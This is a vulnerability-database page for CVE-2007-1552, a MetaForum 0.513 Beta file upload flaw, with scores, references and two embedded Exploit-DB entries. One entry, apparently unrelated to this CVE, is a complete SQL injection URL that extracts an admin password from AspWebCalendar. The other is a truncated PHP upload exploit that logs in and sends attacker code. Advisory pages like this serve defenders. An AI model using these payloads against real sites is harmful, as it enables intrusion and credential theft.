CVE-2007-1552
Published 2007-03-20
Priority P3 51 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 5.46% (91.7th percentile)
Unrestricted file upload vulnerability in usercp.php in MetaForum 0.513 Beta restricts file types based on the MIME type in the Content-type HTTP header, which allows remote attackers to upload and execute arbitrary scripts via an image MIME type with a filename containing an executable extension such as .php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| metaforum | metaforum | — | — |
No detection rules found.
Exploit-DB
AspWebCalendar 4.5 - 'eventid' SQL Injection
exploitdb·2007-03-22
CVE-2004-1552 AspWebCalendar 4.5 - 'eventid' SQL Injection
---
```text
# Title : aspWebCalendar Remote SQL Injection Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$ : free
#S.Page : http://fullrevolution.com
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]
Example:
/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config
"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron
"""""""""""""""""""""
www.p4r4d0x.com
# milw0rm.com [2007-03-22]
```
Exploit-DB
MetaForum 0.513 Beta - Arbitrary File Upload
exploitdb·2007-03-19
CVE-2007-1552 MetaForum 0.513 Beta - Arbitrary File Upload
---
```php
) :\r\n";
$phpcode = trim(fgets(STDIN));
echo "\r\n[+] Connection... ";
$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
    die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
echo "OK\r\n";
echo "[+] Login to account... ";
$reqlogin = "POST ".$argv[2]."index.php?shard=login&action=proc_login HTTP/1.1\r\n";
$reqlogin .= "Host: ".$argv[1]."\r\n";
$reqlogin .= "Accept: */*\r\n";
$reqlogin .= "Connection: Close\r\n";
$reqlogin .= "Content-Type: application/x-www-form-urlencoded\r\n";
$reqlogin .= "Content-Length: ".strlen("login_name=".$argv[3]."&login_pass=".$argv[4])."\r\n\r\n";
$reqlogin .= "login_name=".$argv[3]."&login_pass=".$argv[4];
fwrite($sock, $reqlogin);
while(!feof($sock)) {
    $buffer = fgets($so
```
No writeups or analysis indexed.
http://osvdb.org/34523
http://securityreason.com/securityalert/2454
http://www.aeroxteam.fr/exploit-MetaForum-0.513b.txt
http://www.securityfocus.com/archive/1/463178/100/0/threaded
http://www.securityfocus.com/bid/23032
https://exchange.xforce.ibmcloud.com/vulnerabilities/33097
https://www.exploit-db.com/exploits/3516